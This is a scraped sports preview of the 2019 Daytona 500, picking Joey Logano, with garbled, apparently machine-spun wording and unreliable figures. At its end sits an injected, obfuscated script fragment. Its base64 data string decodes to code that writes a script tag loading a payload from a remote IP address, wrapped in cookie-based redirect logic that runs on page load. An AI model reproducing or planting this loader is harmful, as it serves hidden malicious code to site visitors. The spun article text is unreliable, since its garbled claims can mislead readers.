Daytona 500: Odds, prediction, sleepers, drivers to watch for 2019 race

The Cup Series race of the year is going to start since the Daytona 500 will take place on Sunday.
Coming into this season there are a couple of questions that need to be answered early. Will the Big 3 of Kevin Harvick, Kyle Busch and Martin Truex Jr. dominate the winner’s circle? And next, will these drivers start to usher this game into a new age?
It is going to be hard to tell with only one race as it is one of the hardest races to predict on year but there is a critical chance for a gun to measure up and take home the Daytona title.
MORE: 2019 rule changes clarified | Daytona 500 TV schedule In the previous 10 decades, only 1 driver has repeated as the winner at Daytona (Jimmie Johnson, 2013) and 15 different drivers have seen the checkered flag. This race is a crapshoot and anyone can win.
For now, we are likely to stay conservative with our choice because we’ll choose Joey Logano who’s coming off of his first Cup Series title, and it has finished in the top 10 in 40 percent of his career races in Daytona. He also includes five top-5 finishes and a win (2015).
The Daytona 500 can be seen Sunday at 2:30 p.m. ET on Fox.

Read more: https://bcuknowledgenow.com/boxing-odds/ ds/ “data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘